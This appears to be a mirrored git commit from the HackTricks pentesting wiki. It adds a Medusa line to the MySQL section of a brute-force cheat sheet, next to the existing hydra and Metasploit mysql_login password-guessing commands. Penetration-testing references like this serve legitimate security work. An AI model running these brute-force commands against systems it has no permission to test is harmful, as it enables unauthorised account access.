mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
Merge pull request #279 from virenpawar/patch-3
Update brute-force.md | Added Medusa for MySQL
This commit is contained in:
commit
3f5d733b27
1 changed files with 6 additions and 0 deletions
|
@ -208,8 +208,14 @@ use auxiliary/scanner/mongodb/mongodb_login
|
|||
### MySQL
|
||||
|
||||
```bash
|
||||
# hydra
|
||||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||||
|
||||
# msfconsole
|
||||
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
|
||||
|
||||
# medusa
|
||||
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
|
||||
```
|
||||
|
||||
### OracleSQL
|
||||
|
|
Loading…
Add table
Reference in a new issue